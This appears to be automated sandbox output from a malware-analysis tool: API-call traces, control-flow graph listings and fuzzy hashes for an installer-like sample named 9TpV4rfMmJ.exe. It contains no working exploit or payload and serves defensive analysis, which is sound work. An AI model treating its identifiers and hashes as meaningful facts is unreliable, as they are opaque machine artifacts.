                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.250687189467.0000000071661000.00000020.00000001.01000000.00000004.sdmp, Offset: 71660000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.250687139142.0000000071660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250687238744.0000000071664000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250687268506.0000000071666000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_71660000_9TpV4rfMmJ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3962662361-3916222277
                                                                                                                      • Opcode ID: d3f8afc8ae238b88f3247b89ab3d82567814915c1849d9031b9a9a5f050a1d3c
                                                                                                                      • Instruction ID: d9c0726d1129e1e8585049d4ba4a1699a68f448494cf3b9b76bf6476ca378767
                                                                                                                      • Opcode Fuzzy Hash: d3f8afc8ae238b88f3247b89ab3d82567814915c1849d9031b9a9a5f050a1d3c
                                                                                                                      • Instruction Fuzzy Hash: 584104F2800246ABEB019F35CC88B853BBEBF45350F14452DE946AE0CADB74D484C7A5
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 719 40605c-406068 720 406069-40609d GetTickCount GetTempFileNameW 719->720 721 4060ac-4060ae 720->721 722 40609f-4060a1 720->722 724 4060a6-4060a9 721->724 722->720 723 4060a3 722->723 723->724
                                                                                                                      APIs
                                                                                                                      • GetTickCount.KERNEL32 ref: 0040607A
                                                                                                                      • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040352B,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406095
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.250663501010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.250663434516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663585661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663618581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663786637.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663816094.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663848148.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663874621.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663928907.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_9TpV4rfMmJ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CountFileNameTempTick
                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                      • API String ID: 1716503409-944333549
                                                                                                                      • Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                                                                                      • Instruction ID: cc98cbd97bba9fac9576f26979179aa346a2ab2dc3c85b14509754d74f2b81c3
                                                                                                                      • Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                                                                                      • Instruction Fuzzy Hash: CEF09076B40204FBEB00CF69ED05E9EB7BCEB95750F11803AFA05F7140E6B499648768
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 725 4020d8-4020e4 726 4021a3-4021a5 725->726 727 4020ea-402100 call 402da6 * 2 725->727 728 4022f1-4022f6 call 401423 726->728 736 402110-40211f LoadLibraryExW 727->736 737 402102-40210e GetModuleHandleW 727->737 735 402c2a-402c39 728->735 739 402121-402130 call 406979 736->739 740 40219c-40219e 736->740 737->736 737->739 744 402132-402138 739->744 745 40216b-402170 call 40559f 739->745 740->728 747 402151-402164 call 71661817 744->747 748 40213a-402146 call 401423 744->748 749 402175-402178 745->749 751 402166-402169 747->751 748->749 758 402148-40214f 748->758 749->735 752 40217e-402188 call 403b8c 749->752 751->749 752->735 757 40218e-402197 FreeLibrary 752->757 757->735 758->749
                                                                                                                      APIs
                                                                                                                      • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402103
                                                                                                                        • Part of subcall function 0040559F: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nso8C9B.tmp\System.dll,00000000,00425A20,760823A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                                                                                                        • Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nso8C9B.tmp\System.dll,00000000,00425A20,760823A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                                                                                        • Part of subcall function 0040559F: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nso8C9B.tmp\System.dll,00403418), ref: 004055FA
                                                                                                                        • Part of subcall function 0040559F: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nso8C9B.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nso8C9B.tmp\System.dll), ref: 0040560C
                                                                                                                        • Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                                                                                        • Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                                                                                        • Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                                                                                                      • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402114
                                                                                                                      • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402191
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.250663501010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.250663434516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663585661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663618581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663786637.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663816094.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663848148.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663874621.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663928907.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_9TpV4rfMmJ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 334405425-0
                                                                                                                      • Opcode ID: f19c79c5fba68d9d0d2f2fda6ec06f6b63f6e40353c0f80915a645696cb571d2
                                                                                                                      • Instruction ID: d1cf9917c249e547a3b1759614bc69e8b445b1996c4dbd71fd6f6dd46acd7470
                                                                                                                      • Opcode Fuzzy Hash: f19c79c5fba68d9d0d2f2fda6ec06f6b63f6e40353c0f80915a645696cb571d2
                                                                                                                      • Instruction Fuzzy Hash: 2A21C231904104FACF11AFA5CE48A9D7A71BF48358F20413BF605B91E1DBBD8A82965D
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 760 4015c1-4015d5 call 402da6 call 405eb7 765 401631-401634 760->765 766 4015d7-4015ea call 405e39 760->766 768 401663-4022f6 call 401423 765->768 769 401636-401655 call 401423 call 40653d SetCurrentDirectoryW 765->769 773 401604-401607 call 405aeb 766->773 774 4015ec-4015ef 766->774 783 402c2a-402c39 768->783 769->783 786 40165b-40165e 769->786 784 40160c-40160e 773->784 774->773 777 4015f1-4015f8 call 405b08 774->777 777->773 790 4015fa-4015fd call 405a6e 777->790 787 401610-401615 784->787 788 401627-40162f 784->788 786->783 791 401624 787->791 792 401617-401622 GetFileAttributesW 787->792 788->765 788->766 795 401602 790->795 791->788 792->788 792->791 795->784
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00405EB7: CharNextW.USER32(?,?,0042FA70,?,00405F2B,0042FA70,0042FA70,76083420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,76083420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
                                                                                                                        • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
                                                                                                                        • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2
                                                                                                                      • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                                                        • Part of subcall function 00405A6E: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1
                                                                                                                      • SetCurrentDirectoryW.KERNELBASE(?,00441000,?,00000000,000000F0), ref: 0040164D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.250663501010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.250663434516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663585661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663618581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663786637.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663816094.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663848148.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663874621.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663928907.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_9TpV4rfMmJ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1892508949-0
                                                                                                                      • Opcode ID: 82ddaba883c43a6ad6c7d32de7d3b1a72e39ab97507aea11bcb184130d63296d
                                                                                                                      • Instruction ID: 910f9ca0e916fbda017ea5bccd1daba2d9720f9cae8b5c5670dceb894c5ef12e
                                                                                                                      • Opcode Fuzzy Hash: 82ddaba883c43a6ad6c7d32de7d3b1a72e39ab97507aea11bcb184130d63296d
                                                                                                                      • Instruction Fuzzy Hash: 3E11D031504110EBCF216FA5CD4099F36A0EF25369B28493BE945B52F1DA3E4A829A8E
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                      • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.250663501010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.250663434516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663585661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663618581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663786637.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663816094.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663848148.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663874621.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663928907.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_9TpV4rfMmJ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3850602802-0
                                                                                                                      • Opcode ID: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
                                                                                                                      • Instruction ID: f98c5e72cab4da6dd47fcf147c12dc0649e5852bd482257a86ca63d172a8b8d6
                                                                                                                      • Opcode Fuzzy Hash: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
                                                                                                                      • Instruction Fuzzy Hash: 0B01F4316202209FE7094B389D05B6A3698E710319F14823FF851F65F1EA78DC029B4C
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • ShowWindow.USER32(00000000,00000000), ref: 00401EFC
                                                                                                                      • EnableWindow.USER32(00000000,00000000), ref: 00401F07
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.250663501010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.250663434516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663585661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663618581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663786637.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663816094.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663848148.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663874621.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663928907.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_9TpV4rfMmJ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$EnableShow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1136574915-0
                                                                                                                      • Opcode ID: 17fdff3635e274bccff740d5b56a6ff11ee3748df7be710f89f234bf033d1564
                                                                                                                      • Instruction ID: ff95e9915c8c9942b49c08d49a5710ecdabad47c7be9b03b7ba0a01474a23479
                                                                                                                      • Opcode Fuzzy Hash: 17fdff3635e274bccff740d5b56a6ff11ee3748df7be710f89f234bf033d1564
                                                                                                                      • Instruction Fuzzy Hash: E7E04872908211CFE705EBA4EE495AD77F4EF40325710497FE501F11D1DBB55D00965D
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
                                                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00406937
                                                                                                                        • Part of subcall function 0040689A: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
                                                                                                                        • Part of subcall function 0040689A: wsprintfW.USER32 ref: 004068EC
                                                                                                                        • Part of subcall function 0040689A: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.250663501010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.250663434516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663585661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663618581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663786637.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663816094.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663848148.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663874621.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663928907.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_9TpV4rfMmJ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2547128583-0
                                                                                                                      • Opcode ID: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                                                                                                                      • Instruction ID: 98bdf7d71c6046f852b78b75196177710d0a141037308efd39b2ac7baa162fea
                                                                                                                      • Opcode Fuzzy Hash: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                                                                                                                      • Instruction Fuzzy Hash: 9FE0867390422066D21196745D44D7773A89B99750306443EF946F2090DB38DC31A76E
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\9TpV4rfMmJ.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                                                                                                      • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.250663501010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.250663434516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663585661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663618581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663786637.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663816094.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663848148.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663874621.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663928907.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_9TpV4rfMmJ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: File$AttributesCreate
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 415043291-0
                                                                                                                      • Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                                                                                      • Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
                                                                                                                      • Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                                                                                      • Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetFileAttributesW.KERNELBASE(?,?,00405C0D,?,?,00000000,00405DE3,?,?,?,?), ref: 0040600D
                                                                                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 00406021
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.250663501010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.250663434516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663585661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663618581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663786637.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663816094.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663848148.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663874621.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663928907.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_9TpV4rfMmJ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AttributesFile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3188754299-0
                                                                                                                      • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                                                      • Instruction ID: c979a2e86073268fb5c10017c0603d576bb262e7e1663e1e1b2ee048d1a5e24b
                                                                                                                      • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                                                      • Instruction Fuzzy Hash: 34D012725041316FC2102728EF0C89BBF55EF643717014B35F9A5A22F0CB304C638A98
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1
                                                                                                                      • GetLastError.KERNEL32 ref: 00405AFF
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.250663501010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.250663434516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663585661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663618581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663786637.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663816094.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663848148.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663874621.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663928907.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_9TpV4rfMmJ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateDirectoryErrorLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1375471231-0
                                                                                                                      • Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                                                                                      • Instruction ID: 33feed20cbbf131019f18849f7ccc9358209a8d33535326e0157453b6049084a
                                                                                                                      • Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                                                                                      • Instruction Fuzzy Hash: 1BC04C30204501AED6105B609E48B177AA4DB50741F16843D6146E41E0DA789455EE2D
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • FindCloseChangeNotification.KERNELBASE(00000000), ref: 71662C57
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.250687189467.0000000071661000.00000020.00000001.01000000.00000004.sdmp, Offset: 71660000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.250687139142.0000000071660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250687238744.0000000071664000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250687268506.0000000071666000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_71660000_9TpV4rfMmJ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ChangeCloseFindNotification
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2591292051-0
                                                                                                                      • Opcode ID: 710897c4de4fa87de35ca002dc1e48976bcae2b9a8b2ec9da4bc802ac58efe02
                                                                                                                      • Instruction ID: 051ad104436c05b9369319f2c52a631c8b6fda843c62a25b5f2fae69e0b7c356
                                                                                                                      • Opcode Fuzzy Hash: 710897c4de4fa87de35ca002dc1e48976bcae2b9a8b2ec9da4bc802ac58efe02
                                                                                                                      • Instruction Fuzzy Hash: 6F41BF72508205EBDB118FA5DD8AB4D377FEB44398F30882EE801CA1A4C738D494CBD6
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403498,00000000,0041EA20,000000FF,0041EA20,000000FF,000000FF,00000004,00000000), ref: 004060F3
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.250663501010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.250663434516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663585661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663618581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663786637.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663816094.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663848148.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663874621.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663928907.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_9TpV4rfMmJ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileWrite
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3934441357-0
                                                                                                                      • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                                                      • Instruction ID: d8d859634201a592f38c73999a999f352708a9e59580de02994c407fa40ca669
                                                                                                                      • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                                                      • Instruction Fuzzy Hash: FAE08C3220026AABEF109E60DC04AEB3B6CFB00360F014837FA16E7081E270E93087A4
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

